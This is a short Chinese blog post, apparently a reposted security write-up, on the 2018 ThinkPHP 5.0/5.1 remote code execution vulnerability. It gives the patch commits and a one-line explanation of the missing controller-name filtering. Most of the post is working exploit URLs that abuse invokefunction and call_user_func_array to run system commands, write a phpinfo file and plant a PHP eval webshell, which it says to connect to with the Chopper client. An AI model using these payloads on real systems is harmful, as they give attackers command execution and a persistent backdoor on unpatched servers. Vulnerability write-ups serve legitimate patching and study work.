前言
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。
漏洞分析
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f
Thinkphp v5.1.x补丁地址: https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815
关键代码:
代码语言:javascript复制// 获取控制器名
$controller = strip_tags($result[1] ?: $this->rule->getConfig('default_controller'));在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入符号来调用任意类方法。
漏洞利用
执行系统命令显示目录下文件
代码语言:javascript复制http://tp.vsplate.me/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls -l
执行phpinfo
代码语言:javascript复制http://tp.vsplate.me/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'phpinfo();'
写info.php文件
代码语言:javascript复制http://tp.vsplate.me/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php phpinfo();?>' > info.php访问 info.php
同理,我们可以利用此方法写入PHP一句话木马。
index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['c']);?>' > inf.php然后我们用菜刀连接即可。
版权属于:逍遥子大表哥
本文链接:https://cloud.tencent.com/developer/article/1920660
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
